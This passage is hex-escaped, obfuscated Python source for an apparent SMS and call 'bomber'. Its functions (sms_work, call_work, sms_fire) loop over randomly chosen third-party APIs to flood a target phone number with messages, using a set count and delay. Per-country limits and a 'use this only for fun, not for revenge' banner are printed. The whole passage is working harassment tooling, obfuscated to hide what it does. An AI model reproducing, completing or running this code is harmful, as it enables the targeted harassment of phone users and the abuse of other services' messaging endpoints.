36\x7d\x58\x7b\x34\x7d\x7b\x33\x7d\x22\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x5c\x74\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x58\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x67\x65\x74\x5f\x69\x6e\x66\x6f\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6f\x5f\x63\x61\x6c\x6c\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x61\x6c\x6c\x5f\x73\x61\x76\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x33\x29\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d
\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x64\x65\x66\x20\x73\x6d\x73\x5f\x77\x6f\x72\x6b\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x63\x63\x0a\x20\x20\x20\x20\x67
\x6c\x6f\x62\x61\x6c\x20\x70\x6e\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x64\x6c\x0a\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x69\x6e\x74\x28\x6e\x6d\x29\x0a\x20\x20\x20\x20\x6d\x61\x78\x6c\x69\x6d\x20\x3d\x20\x30\x0a\x20\x20\x20\x20\x69\x66\x20\x63\x63\x20\x3d\x3d\x20\x22\x39\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x78\x6c\x69\x6d\x20\x3d\x20\x35\x30\x30\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x78\x6c\x69\x6d\x20\x3d\x20\x31\x30\x30\x0a\x20\x20\x20\x20\x69\x66\x20\x6e\x6d\x20\x3e\x20\x6d\x61\x78\x6c\x69\x6d\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x20\x54\x68\x69\x73\x20\x53\x63\x72\x69\x70\x74\x20\x57\x69\x6c\x6c\x20\x4f\x66\x66\x65\x72\x65\x64\x20\x4f\x6e\x6c\x79\x27\x20\x2b\x73\x74\x72\x28\x6d\x61\x78\x6c\x69\x6d\x29\x20\x2b\x20\x27\x20\x53\x4d\x53\x20\x41\x74\x20\x4f\x6e\x63\x65\x2e\x2e\x21\x5c\x6e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x74\x5c\x74\x4e\x75\x6d\x62\x65\x72\x20\x4f\x66\x20\x53\x4d\x53\x20\x48\x61\x73\x20\x62\x65\x65\x6e\x20\x53\x65\x74\x20\x54\x6f\x20\x27\x20\x2b\x20\x73\x74\x72\x28\x6d\x61\x78\x6c\x69\x6d\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x6d\x61\x78\x6c\x69\x6d\x0a\x0a\x64\x65\x66\x20\x63\x61\x6c\x6c\x5f\x77\x6f\x72\x6b\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x63\x63\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x70\x6e\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x64\x6c\x0a\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x69\x6e\x74\x28\x6e\x6d\x29\x0a\x20\x20\x20\x20\x6d\x61\x78\x6c\x69\x6d\x20\x3d\x20\x32\x30\x0a\x20\x20\x20\x20\x69\x66\x20\x6e\x6d\x20\x3e\x20\x6d\x61\x78\x6c\x69\x6d\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x20\x54\x68\x69\x73\x20\x53\x63\x72\x69\x70
\x74\x20\x57\x69\x6c\x6c\x20\x4f\x66\x66\x65\x72\x65\x64\x20\x4f\x6e\x6c\x79\x27\x20\x2b\x73\x74\x72\x28\x6d\x61\x78\x6c\x69\x6d\x29\x20\x2b\x20\x27\x20\x43\x61\x6c\x6c\x73\x20\x41\x74\x20\x4f\x6e\x63\x65\x2e\x2e\x21\x5c\x6e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x74\x5c\x74\x4e\x75\x6d\x62\x65\x72\x20\x4f\x66\x20\x43\x61\x6c\x6c\x73\x20\x48\x61\x73\x20\x62\x65\x65\x6e\x20\x53\x65\x74\x20\x54\x6f\x20\x27\x20\x2b\x20\x73\x74\x72\x28\x6d\x61\x78\x6c\x69\x6d\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x6d\x61\x78\x6c\x69\x6d\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x64\x65\x66\x20\x73\x6d\x73\x5f\x66\x69\x72\x65\x28\x74\x61\x72\x67\x65\x74\x2c\x20\x63\x6f\x75\x6e\x74\x65\x72\x2c\x20\x64\x65\x6c\x61\x79\x2c\x20\x63\x68\x2c\x20\x63\x63\x29\x3a\x0a\x20\x20\x20\x20\x23\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b
\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x0a\x20\x20\x20\x20\x74\x72\x20\x3d\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x66\x61\x69\x6c\x65\x64\x20\x3d\x20\x30\x0a\x20\x20\x20\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x3d\x20\x30\x0a\x20\x20\x20\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3d\x20\x69\x6e\x74\x28\x72\x65\x71\x75\x65\x73\x74\x65\x64\x29\x20\x2d\x20\x69\x6e\x74\x28\x66\x61\x69\x6c\x65\x64\x29\x0a\x20\x20\x20\x20\x62\x6f\x6d\x62\x73\x20\x3d\x20\x69\x6e\x74\x28\x63\x6f\x75\x6e\x74\x65\x72\x29\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x77\x68\x69\x6c\x65\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3c\x20\x28\x69\x6e\x74\x28\x62\x6f\x6d\x62\x73\x29\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x63\x6c\x65\x61\x72\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x61\x70\x69\x20\x3d\x20\x72\x61\x6e\x64\x6f\x6d\x2e\x63\x68\x6f\x69\x63\x65\x28\x63\x68\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x63\x63\x20\x3d\x3d\x20\x22\x39\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x21\x20\x41\x6c\x6c\x20\x41\x50\x49\x73\x20\x48\x61\x76\x65\x20\x45\x78\x70\x69\x72\x65\x64\x20\x50\x6c\x65\x61\x73\x65\x20\x55\x70\x64\x61\x74\x65\x20\x42\x6f\x6d\x62\x20\x4f\x72\x20\x52\x75\x6e\x20\x49\x74\x20\x41\x67\x61\x69\x6e\x2e\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d
\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3e\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x57\x65\x20\x41\x72\x65\x20\x53\x6f\x72\x72\x79\x20\x54\x6f\x20\x53\x61\x79\x20\x54\x68\x61\x74\x20\x42\x6f\x6d\x62\x69\x6e\x67\x20\x4c\x69\x6d\x69\x74\x20\x46\x6f\x72\x20\x59\x6f\x75\x72\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x48\x61\x73\x20\x42\x65\x65\x6e\x20\x52\x65\x61\x63\x68\x65\x64\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x57\x65\x20\x41\x72\x65\x20\x57\x6f\x72\x6b\x69\x6e\x67\x20\x54\x6f\x6f\x20\x48\x61\x72\x64\x20\x54\x6f\x20\x49\x6e\x63\x72\x65\x61\x73\x65\x20\x54\x68\x65\x20\x49\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x20\x4c\x69\x6d\x69\x74\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x54\x68\x69\x73\x20\x77\x69\x6c\x6c\x20\x68\x65\x6c\x70\x20\x75\x73\x20\x74\x6f\x20\x67\x69\x76\x65\x20\x73\x75\x70\x70\x6f\x72\x74\x20\x74\x6f\x20\x79\x6f\x75\x72\x20\x63\x6f\x75\x6e\x74\x72\x79\x20\x66\x61\x73\x74\x2e\x2e\x2e\x5c\x6e\x5c\x6e\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x45\x78\x69\x74\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x59\x6f\x75\x72\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x69\x73\x20\x4e\x6f\x74\x20\x53\x75\x70\x70\x6f\x72\x74\x65\x64\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x74\x5c\x74\x50\x6c\x65\x61\x73\x65\x20\x53\x65\x6e\x64\x20\x41\x20\x4d\x61\x69\x6c\x20\x54\x6f\x20\x68\x61\x73\x61\x6e\x66\x69\x72\x6e\x61\x73\x32\x34\x32\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x20\x54\x6f\x20\x4c\x65\x74\x20\x55\x73\x20\x4b\x6e\x6f\x77\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x54\x61\x72\x67\x65\x74\x20\x4e\x75\x6d\x62\x65\x72\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3a\x20\x2b\x7b\x30\x7d\x20\x7b\x31\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x73\x74\x72\x28\x63\x63\x29\x2c\x74\x61\x72\x67\x65\x74\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
\x20\x4e\x75\x6d\x62\x65\x72\x20\x6f\x66\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x53\x65\x6e\x74\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x72\x65\x71\x75\x65\x73\x74\x65\x64\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x20\x20\x20\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x73\x75\x63\x63\x65\x73\x73\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x46\x61\x69\x6c\x65\x64\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x66\x61\x69\x6c\x65\x64\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x55\x73\x65\x20\x74\x68\x69\x73\x20\x4f\x6e\x6c\x79\x20\x66\x6f\x72\x20\x66\x75\x6e\x2c\x20\x6e\x6f\x74\x20\x66\x6f\x72\x20\x72\x65\x76\x65\x6e\x67\x65\x20\x21\x21\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66
\x6f\x72\x6d\x61\x74\x28\x72\x61\x6e\x64\x6f\x6d\x2e\x63\x68\x6f\x69\x63\x65\x28\x63\x6f\x6c\x6f\x72\x73\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x54\x68\x69\x73\x20\x42\x6f\x6d\x62\x65\x72\x20\x57\x61\x73\x20\x43\x72\x65\x61\x74\x65\x64\x20\x42\x79\x20\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x20\x21\x21\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x20\x3d\x20\x67\x65\x74\x5f\x61\x70\x69\x28\x74\x61\x72\x67\x65\x74\x2c\x61\x70\x69\x2c\x63\x63\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x20\x3d\x20\x46\x61\x6c\x73\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x72\x65\x73\x75\x6c\x74\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3d\x20\x73\x75\x63\x63\x65\x73\x73\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x66\x61\x69\x6c\x65\x64\x20\x3d\x20\x66\x61\x69\x6c\x65\x64\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20
\x20\x20\x20\x20\x20\x20\x20\x77\x68\x69\x6c\x65\x20\x63\x68\x2e\x63\x6f\x75\x6e\x74\x28\x61\x70\x69\x29\x20\x3e\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x2e\x72\x65\x6d\x6f\x76\x65\x28\x61\x70\x69\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x66\x6c\x6f\x61\x74\x28\x64\x65\x6c\x61\x79\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x25\x20\x33\x20\x3d\x3d\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x23\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\